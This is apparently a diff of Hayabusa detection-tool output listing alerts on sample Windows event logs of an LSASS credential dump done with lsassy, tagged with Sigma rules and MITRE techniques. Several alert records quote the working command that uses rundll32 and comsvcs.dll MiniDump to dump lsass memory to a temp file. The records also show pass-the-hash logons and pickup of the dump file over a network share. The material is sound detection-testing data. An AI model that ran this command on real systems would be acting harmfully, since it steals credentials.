+2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1086,technique_name=PowerShell | Cmd: powershell.exe -NoP -C ""C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id \Windows\Temp\76nivOxA.dmp full;Wait-Process -Id (Get-Process rundll32).id"" | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: OFFSEC\admmig | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x269eec8 | PID: 2508 | PGUID: 7CF65FC7-254F-6170-9402-000000001200 | Hash: SHA1=9F1E24917EF96BBB339F4E2A226ACAFD1009F47B,MD5=C031E215B8B08C752BF362F6D4C5D3AD,SHA256=840E1F9DC5A29BEBF01626822D7390251E9CF05BB3560BA7B68BDB8A41CF08E3,IMPHASH=099B747A4A31983374E54912D4BB7C44",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
+2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,Exec,Suspicious PowerShell Parent Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
+2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,Exec,Wmiprvse Spawning Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
+2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,Exec,Suspicious Script Execution From Temp Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
+2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,low,Exec,Non Interactive PowerShell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
+2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,CredAccess,LSASS Memory Dumping,,../hayabusa-rules/sigma/process_creation/proc_creation_win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
+2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,Exec,WMI Spawning Windows PowerShell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmi_spwns_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
+2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,CredAccess,PowerShell Get-Process LSASS,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_powershell_getprocess_lsass.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
+2021-10-20 23:18:55.855 +09:00,FS03.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1049,technique_name=System Network Connections Discovery | Pipe: \srvsvc | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 2508 | PGUID: 7CF65FC7-254F-6170-9402-000000001200",../hayabusa-rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
+2021-10-20 23:18:55.871 +09:00,FS03.offsec.lan,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1086,technique_name=PowerShell | Image: C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\3e50931f5376ebab490b124f3f46dd45\System.Management.Automation.ni.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: false | Signature: Unavailable | PID: 2508 | PGUID: 7CF65FC7-254F-6170-9402-000000001200 | Hash: SHA1=BFDFC46117000B652897F1DE8084FBB9EAA66384,MD5=6EF679145F15A8E54FBF9B23A25A6F21,SHA256=240674945FF5175A14E5DF6DEB2AECD04231911DE9103CA34F6D327C4FF86732,IMPHASH=00000000000000000000000000000000",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
+2021-10-20 23:18:56.089 +09:00,FS03.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1086,technique_name=PowerShell | Cmd: ""C:\Windows\System32\rundll32.exe"" C:\Windows\System32\comsvcs.dll MiniDump 512 \Windows\Temp\76nivOxA.dmp full | Process: C:\Windows\System32\rundll32.exe | User: OFFSEC\admmig | Parent Cmd: powershell.exe -NoP -C ""C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id \Windows\Temp\76nivOxA.dmp full;Wait-Process -Id (Get-Process rundll32).id"" | LID: 0x269eec8 | PID: 2860 | PGUID: 7CF65FC7-2550-6170-9602-000000001200 | Hash: SHA1=D4AC232D507769FFD004439C15302916A40D9831,MD5=6C308D32AFA41D26CE2A0EA8F7B79565,SHA256=5CC2C563D89257964C4B446F54AFE1E57BBEE49315A9FC001FF5A6BCB6650393,IMPHASH=156B2AC675B1B9202AF35C643105610C",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
+2021-10-20 23:18:56.089 +09:00,FS03.offsec.lan,1,high,Evas | CredAccess,Process Dump via Comsvcs DLL,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_comsvcs_procdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
+2021-10-20 23:18:56.105 +09:00,FS03.offsec.lan,11,info,,File Created,Path: C:\Windows\Temp\76nivOxA.dmp | Process: C:\Windows\System32\rundll32.exe | PID: 2860 | PGUID: 7CF65FC7-2550-6170-9602-000000001200,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
+2021-10-20 23:18:56.105 +09:00,FS03.offsec.lan,10,low,,Process Access,Src Process: C:\Windows\System32\rundll32.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2860 | Src PGUID: 7CF65FC7-2550-6170-9602-000000001200 | Tgt PID: 512 | Tgt PGUID: 7CF65FC7-6649-6165-0B00-000000001200,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
+2021-10-20 23:18:56.105 +09:00,FS03.offsec.lan,10,critical,CredAccess,Lsass Memory Dump via Comsvcs DLL,,../hayabusa-rules/sigma/process_access/sysmon_lsass_dump_comsvcs_dll.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
+2021-10-20 23:19:03.334 +09:00,FS03.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1049,technique_name=System Network Connections Discovery | Pipe: \srvsvc | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1640 | PGUID: 7CF65FC7-665F-6165-2000-000000001200",../hayabusa-rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
+2021-10-20 23:19:03.334 +09:00,FS03.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1049,technique_name=System Network Connections Discovery | Pipe: \srvsvc | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1640 | PGUID: 7CF65FC7-665F-6165-2000-000000001200",../hayabusa-rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
+2021-10-20 23:19:23.345 +09:00,FS03.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1049,technique_name=System Network Connections Discovery | Pipe: \srvsvc | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1640 | PGUID: 7CF65FC7-665F-6165-2000-000000001200",../hayabusa-rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
+2021-10-20 23:19:23.345 +09:00,FS03.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1049,technique_name=System Network Connections Discovery | Pipe: \srvsvc | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1640 | PGUID: 7CF65FC7-665F-6165-2000-000000001200",../hayabusa-rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
+2021-10-20 23:19:43.347 +09:00,FS03.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1049,technique_name=System Network Connections Discovery | Pipe: \srvsvc | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1640 | PGUID: 7CF65FC7-665F-6165-2000-000000001200",../hayabusa-rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
+2021-10-20 23:19:43.347 +09:00,FS03.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1049,technique_name=System Network Connections Discovery | Pipe: \srvsvc | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1640 | PGUID: 7CF65FC7-665F-6165-2000-000000001200",../hayabusa-rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
+2021-10-20 23:29:09.758 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x26bdfac,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
+2021-10-20 23:29:09.758 +09:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x26bdfac,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
+2021-10-20 23:29:09.758 +09:00,FS03.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
+2021-10-20 23:29:09.773 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x26bdfde,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
+2021-10-20 23:29:09.773 +09:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x26bdfde,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
+2021-10-20 23:29:09.836 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x26be000,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
+2021-10-20 23:29:09.836 +09:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x26be000,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
+2021-10-20 23:29:09.898 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x26be01f,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
+2021-10-20 23:29:09.898 +09:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x26be01f,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
+2021-10-20 23:29:09.961 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x26be03c,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
+2021-10-20 23:29:09.961 +09:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x26be03c,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
+2021-10-20 23:29:10.214 +09:00,FS03.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp\2V7Be7Gq.dmp | IP Addr: 10.23.123.11 | LID: 0x26bdfac,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
+2021-10-20 23:29:10.214 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -NoP -C ""C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id \Windows\Temp\2V7Be7Gq.dmp full;Wait-Process -Id (Get-Process rundll32).id"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x998 | User: FS03$ | LID: 0x3e4",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
+2021-10-20 23:29:10.214 +09:00,FS03.offsec.lan,5145,medium,Collect,Suspicious Access to Sensitive File Extensions,,../hayabusa-rules/sigma/builtin/security/win_susp_raccess_sensitive_fext.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
+2021-10-20 23:29:10.526 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\rundll32.exe"" C:\Windows\System32\comsvcs.dll MiniDump 512 \Windows\Temp\2V7Be7Gq.dmp full | Path: C:\Windows\System32\rundll32.exe | PID: 0xff8 | User: admmig | LID: 0x26be03c",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
+2021-10-20 23:29:10.542 +09:00,FS03.offsec.lan,4656,critical,CredAccess,LSASS Access from Non System Account,,../hayabusa-rules/sigma/builtin/security/win_lsass_access_non_system_account.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
+2021-10-20 23:29:10.542 +09:00,FS03.offsec.lan,4656,high,CredAccess,Generic Password Dumper Activity on LSASS,,../hayabusa-rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
+2021-10-20 23:29:10.542 +09:00,FS03.offsec.lan,4663,high,CredAccess,Generic Password Dumper Activity on LSASS,,../hayabusa-rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
+2021-10-20 23:29:10.542 +09:00,FS03.offsec.lan,4663,high,CredAccess,Generic Password Dumper Activity on LSASS,,../hayabusa-rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
+2021-10-20 23:29:11.230 +09:00,FS03.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp\2V7Be7Gq.dmp | IP Addr: 10.23.123.11 | LID: 0x26bdfac,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
+2021-10-20 23:29:11.230 +09:00,FS03.offsec.lan,5145,medium,Collect,Suspicious Access to Sensitive File Extensions,,../hayabusa-rules/sigma/builtin/security/win_susp_raccess_sensitive_fext.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
+2021-10-20 23:29:12.553 +09:00,FS03.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp\2V7Be7Gq.dmp | IP Addr: 10.23.123.11 | LID: 0x26bdfac,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
+2021-10-20 23:29:12.553 +09:00,FS03.offsec.lan,5145,medium,Collect,Suspicious Access to Sensitive File Extensions,,../hayabusa-rules/sigma/builtin/security/win_susp_raccess_sensitive_fext.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
+2021-10-20 23:29:13.725 +09:00,FS03.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Sysmon\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x262bb6b,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
+2021-10-20 23:29:22.291 +09:00,FS03.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Sysmon\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x262bb6b,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
+2021-10-20 23:39:26.224 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"""PS $($executionContext.SessionState.Path.CurrentLocation)$('>' * ($nestedPromptLevel + 1)) "" # .Link # http://go.microsoft.com/fwlink/?LinkID=225750 # .ExternalHelp System.Management.Automation.dll-help.xml",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx
+2021-10-20 23:39:26.240 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"<# Options include: RelativeFilePaths - [bool] Always resolve file paths using Resolve-Path -Relative. The default is to use some heuristics to guess if relative or absolute is better. To customize your own custom options, pass a hashtable to CompleteInput, e.g. return [System.Management.Automation.CommandCompletion]::CompleteInput($inputScript, $cursorColumn, @{ RelativeFilePaths=$false } #> [CmdletBinding(DefaultParameterSetName = 'ScriptInputSet')] Param( [Parameter(ParameterSetName = 'ScriptInputSet', Mandatory = $true, Position = 0)] [string] $inputScript, [Parameter(ParameterSetName = 'ScriptInputSet', Mandatory = $true, Position = 1)] [int] $cursorColumn, [Parameter(ParameterSetName = 'AstInputSet', Mandatory = $true, Position = 0)] [System.Management.Automation.Language.Ast] $ast, [Parameter(ParameterSetName = 'AstInputSet', Mandatory = $true, Position = 1)] [System.Management.Automation.Language.Token[]] $tokens, [Parameter(ParameterSetName = 'AstInputSet', Mandatory = $true, Position = 2)] [System.Management.Automation.Language.IScriptPosition] $positionOfCursor, [Parameter(ParameterSetName = 'ScriptInputSet', Position = 2)] [Parameter(ParameterSetName = 'AstInputSet', Position = 3)] [Hashtable] $options = $null ) End { if ($psCmdlet.ParameterSetName -eq 'ScriptInputSet') { return [System.Management.Automation.CommandCompletion]::CompleteInput( <#inputScript#> $inputScript, <#cursorColumn#> $cursorColumn, <#options#> $options) } else { return [System.Management.Automation.CommandCompletion]::CompleteInput( <#ast#> $ast, <#tokens#> $tokens, <#positionOfCursor#> $positionOfCursor, <#options#> $options) } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx
+2021-10-20 23:39:26.240 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"$space = New-Object System.Management.Automation.Host.BufferCell $space.Character = ' ' $space.ForegroundColor = $host.ui.rawui.ForegroundColor $space.BackgroundColor = $host.ui.rawui.BackgroundColor $rect = New-Object System.Management.Automation.Host.Rectangle $rect.Top = $rect.Bottom = $rect.Right = $rect.Left = -1 $origin = New-Object System.Management.Automation.Host.Coordinates $Host.UI.RawUI.CursorPosition = $origin $Host.UI.RawUI.SetBufferContents($rect, $space) # .Link # http://go.microsoft.com/fwlink/?LinkID=225747 # .ExternalHelp System.Management.Automation.dll-help.xml",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx
+2021-10-20 23:39:26.240 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param([string[]]$paths) $OutputEncoding = [System.Console]::OutputEncoding if($paths) { foreach ($file in $paths) { Get-Content $file | more.com } } else { $input | more.com },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx
+2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"<# .FORWARDHELPTARGETNAME Get-Help .FORWARDHELPCATEGORY Cmdlet #> [CmdletBinding(DefaultParameterSetName='AllUsersView', HelpUri='http://go.microsoft.com/fwlink/?LinkID=113316')] param( [Parameter(Position=0, ValueFromPipelineByPropertyName=$true)] [string] ${Name}, [string] ${Path}, [ValidateSet('Alias','Cmdlet','Provider','General','FAQ','Glossary','HelpFile','ScriptCommand','Function','Filter','ExternalScript','All','DefaultHelp','Workflow')] [string[]] ${Category}, [string[]] ${Component}, [string[]] ${Functionality}, [string[]] ${Role}, [Parameter(ParameterSetName='DetailedView', Mandatory=$true)] [switch] ${Detailed}, [Parameter(ParameterSetName='AllUsersView')] [switch] ${Full}, [Parameter(ParameterSetName='Examples', Mandatory=$true)] [switch] ${Examples}, [Parameter(ParameterSetName='Parameters', Mandatory=$true)] [string] ${Parameter}, [Parameter(ParameterSetName='Online', Mandatory=$true)] [switch] ${Online}, [Parameter(ParameterSetName='ShowWindow', Mandatory=$true)] [switch] ${ShowWindow}) #Set the outputencoding to Console::OutputEncoding. More.com doesn't work well with Unicode. $outputEncoding=[System.Console]::OutputEncoding Get-Help @PSBoundParameters | more",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx
+2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"<# .FORWARDHELPTARGETNAME New-Item .FORWARDHELPCATEGORY Cmdlet #> [CmdletBinding(DefaultParameterSetName='pathSet', SupportsShouldProcess=$true, SupportsTransactions=$true, ConfirmImpact='Medium')] [OutputType([System.IO.DirectoryInfo])] param( [Parameter(ParameterSetName='nameSet', Position=0, ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='pathSet', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [System.String[]] ${Path}, [Parameter(ParameterSetName='nameSet', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [AllowNull()] [AllowEmptyString()] [System.String] ${Name}, [Parameter(ValueFromPipeline=$true, ValueFromPipelineByPropertyName=$true)] [System.Object] ${Value}, [Switch] ${Force}, [Parameter(ValueFromPipelineByPropertyName=$true)] [System.Management.Automation.PSCredential] ${Credential} ) begin { try { $wrappedCmd = $ExecutionContext.InvokeCommand.GetCommand('New-Item', [System.Management.Automation.CommandTypes]::Cmdlet) $scriptCmd = {& $wrappedCmd -Type Directory @PSBoundParameters } $steppablePipeline = $scriptCmd.GetSteppablePipeline() $steppablePipeline.Begin($PSCmdlet) } catch { throw } } process { try { $steppablePipeline.Process($_) } catch { throw } } end { try { $steppablePipeline.End() } catch { throw } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx
